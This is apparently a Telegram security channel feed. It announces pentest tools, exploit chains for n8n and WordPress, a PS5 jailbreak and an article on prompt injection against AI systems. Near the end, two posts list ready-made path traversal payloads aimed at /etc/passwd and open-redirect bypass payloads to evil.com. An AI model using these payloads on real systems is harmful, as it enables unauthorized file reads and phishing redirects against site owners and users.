Root Access Club
284 subscribers
90 photos
1 video
109 links
RootAccessClub ๐Ÿ’Ž

Security knowledge & research ๐Ÿ”Ž

Understanding systems, not abusing them โ›”๏ธ

โš ๏ธ Educational purposes only
Download Telegram
Legion โ€” Automated Network Pentesting ๐Ÿ›ก๏ธ

Legion is a GUI based network penetration testing framework built to automate reconnaissance, scanning, service enumeration, and vulnerability discovery

๐Ÿ”ธ Nmap, Nikto, WhatWeb, Hydra, SMBenum

๐Ÿ”น CVE & vulnerability mapping

๐Ÿ”ธ Automated scanning & enumeration

Github ๐Ÿ”—

๐Ÿ“ก @RootAccessClub
โคโ€๐Ÿ”ฅ2
CVE-2026-21858 + CVE-2025-68613 - n8n Full Chain ๐Ÿ’ฅ

Unauthenticated Arbitrary File Read โ†’ Admin Token Forge โ†’ Sandbox Bypass โ†’ RCE ๐ŸŒช

CVSS : 10.0 + 9.9 (Critical) โš ๏ธ
Fixed : 1.121.0 (AFR) / 1.120.4+ (RCE) โœ…


Github ๐ŸŒ

๐ŸชŽ @RootAccessClub
โคโ€๐Ÿ”ฅ1
Osintgram ๐Ÿ‘ฅ

An open source OSINT framework for Instagram reconnaissance and information gathering ๐Ÿ”Ž

Key Features:

โ€ข Profile & content analysis
โ€ข Followers / Following analysis
โ€ข Hashtag & location searches
โ€ข Media and metadata analysis
โ€ข Account comparison
โ€ข Interactive Web UI
โ€ข AI assisted mode with local Ollama support
โ€ข JSON & HTML report generation


GitHub ๐Ÿ”—

โš ๏ธ Use responsibly and only with data you are authorized to investigate

๐Ÿ’Ž @RootAccessClub
โคโ€๐Ÿ”ฅ4
WordPress Critical RCE ๐Ÿšจ

CVE-2026-87902 | CVSS 9.2 ๐Ÿซฏ

A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐Ÿ’ฃ

Affected versions span 4.7 โ†’ 7.1.1 ๐Ÿฆ 

๐Ÿ›ก๏ธ Fix: Update to the latest patched WordPress release for your branch

GitHub ๐Ÿ”—

@RootAccessClub
๐Ÿ”ฅ2
Root Access Club
WordPress Critical RCE ๐Ÿšจ CVE-2026-87902 | CVSS 9.2 ๐Ÿซฏ A critical unauthenticated path traversal vulnerability in WordPress Core can, under specific conditions, lead to Remote Code Execution (RCE) through page template resolution ๐Ÿ’ฃ Affected versions spanโ€ฆ
CVE-2026-87902 ๐Ÿชค

PoC for CVE-2026-87902 โ€“ unauthenticated path traversal in WordPress page-template resolution (local PHP inclusion, conditional RCE) with a pinned vulnerable lab

GitHub ๐Ÿ”—

โš ๏ธ Authorized security testing, education, and defensive research only

๐Ÿ’Ž @RootAccessClub
๐Ÿ”ฅ2
Prompt Injection in the Wild ๐Ÿ’‰

A look at real world In Page Prompt Injection attacks, where malicious instructions are hidden inside web content and processed by AI systems

Link ๐Ÿ”—

@RootAccessClub
๐Ÿ”ฅ3
AutoPWN Suite โšก๏ธ

An automated penetration testing framework designed to streamline reconnaissance, vulnerability discovery, and security testing โœจ

โ€ข Nmap-based network & service enumeration
โ€ข CVE & vulnerability discovery
โ€ข Automated exploit searching
โ€ข Web vulnerability testing
โ€ข Directory enumeration
โ€ข Web UI + REST API
โ€ข Scan scheduling & automation
โ€ข Email / Webhook notifications
โ€ข Optional evasion techniques

GitHub ๐Ÿ”—

๐ŸŒช @RootAccessClub
โคโ€๐Ÿ”ฅ3
Relapse โ€“ PS5 Jailbreak Exploit ๐ŸŽฎ

A new exploit chain called Relapse has been released, targeting PS5 firmware versions 7.00 through 13.60 ๐ŸŽฏ

๐Ÿ”น WebKit Exploit
๐Ÿ”น Kernel Exploit
๐Ÿ”น Execution of unofficial payloads
๐Ÿ”น Support for payloads such as kstuff and etaHEN


When successfully executed, Relapse can enable a Jailbreak environment and allow execution of unofficial code and payloads on the PS5 ๐Ÿ’ฅ

โš ๏ธ Check your console's firmware version before attempting anything

GitHub ๐Ÿ”—

๐ŸชŽ @RootAccessCLUB
โšก2
Path Traversal Bypasses โšก๏ธ

Null Byte Injection
../../../etc/./passwd%00.png

Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd

Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32F/passwd

Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././

โญ๏ธ @RootAccessClub
SubZer0 ๐Ÿ‘€โ„๏ธ

Soon โณ
โšก2๐Ÿ”ฅ1
Open redirects filter bypass payloads ๐Ÿ’ฅ

---->\/evil.com
---->\/\/evil.com
---->\\evil.com
----//evil.com
---->//theirsite@evil.com
---->////evil.com
----//google%E3%80%82com
---->//%2F/evil.com
---->////evil.com
---->/%2F/yoururl.com

๐ŸชŽ @RootAccessClub